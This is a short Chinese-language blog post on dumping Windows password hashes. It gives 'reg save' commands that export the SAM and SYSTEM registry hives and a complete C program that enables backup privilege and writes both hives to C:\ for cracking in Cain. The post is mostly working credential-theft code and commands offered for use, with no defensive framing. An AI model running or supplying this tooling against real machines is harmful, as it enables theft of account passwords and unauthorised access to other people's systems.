得系统Hash

Pwdump得hash很不稳定,不稳定啊不稳定。有个方法得hash很方便:

reg save hklm\sam c:\sam.hive
reg save hklm\system c:\system.hive

然后在Cain的Cracker中导进这两个文件就可以破hash了。虽然这个方法很好用,不过reg save需要Administrators的权限。可以用批处,哥直接跑程序。

#include <stdio.h>
#include <windows.h>

int main()
{
    char szSam_Key[] = "SAM";
    char szSystem_Key[] = "SYSTEM";
    char szSecurity_Key[] = "SECURITY";
    HKEY hKey;
    HANDLE hToken = NULL;
    LUID sedebugnameValue;
    TOKEN_PRIVILEGES tkp;
    printf("=================================================\n");
    printf("By:乱雪\n");
    printf("Blog:hi.baidu.com/lu4nx\n");
    printf("说明:C盘目录下生成sam.hive和system.hive两个文件,直接用Cain跑密码\n");
    printf("注意:需要Administrator权限\n");
    printf("=================================================\n");
    /*********************************************************/
    //调整权限,需要SE_BACKUP_NAME权限
    if ( !OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY, &hToken))
    {
	printf("OpenProcessToken Faild\n");
	return 0;
    }

    if ( !LookupPrivilegeValue(NULL,
			       SE_BACKUP_NAME,
			       &sedebugnameValue
			       ))
    {
	printf("LookupPrivilegeValue Faild\n");
	return 0;
    }
    tkp.PrivilegeCount = 1;
    tkp.Privileges[0].Luid = sedebugnameValue;
    tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    if ( !AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof(tkp), NULL, NULL))
    {
	printf("AdjustTokenPrivileges\n");
	return 0;
    }
    /*********************************************************/
    //导出SAM
    RegOpenKeyEx(HKEY_LOCAL_MACHINE, szSam_Key, 0, KEY_ALL_ACCESS, &hKey);
    if (  NULL != hKey )
    {
	//printf("Open Key Success.\n");
	RegSaveKeyEx(hKey, "c:\\sam.hive", NULL, REG_STANDARD_FORMAT);
    } else {
	printf("打开SAM出错\n");
	return 0;
    }

  //导出SYSTEM
  RegOpenKeyEx(HKEY_LOCAL_MACHINE, szSystem_Key, 0, KEY_ALL_ACCESS, &hKey);
  if (  NULL != hKey )
  {
      //printf("Open Key Success.\n");
      RegSaveKeyEx(hKey, "c:\\system.hive", NULL, REG_STANDARD_FORMAT);
  } else {
      printf("打开SYSTEM出错\n");
      return 0;
  }
  //关闭注册表
  RegCloseKey(hKey);
  //getchar();
  return 0;
  }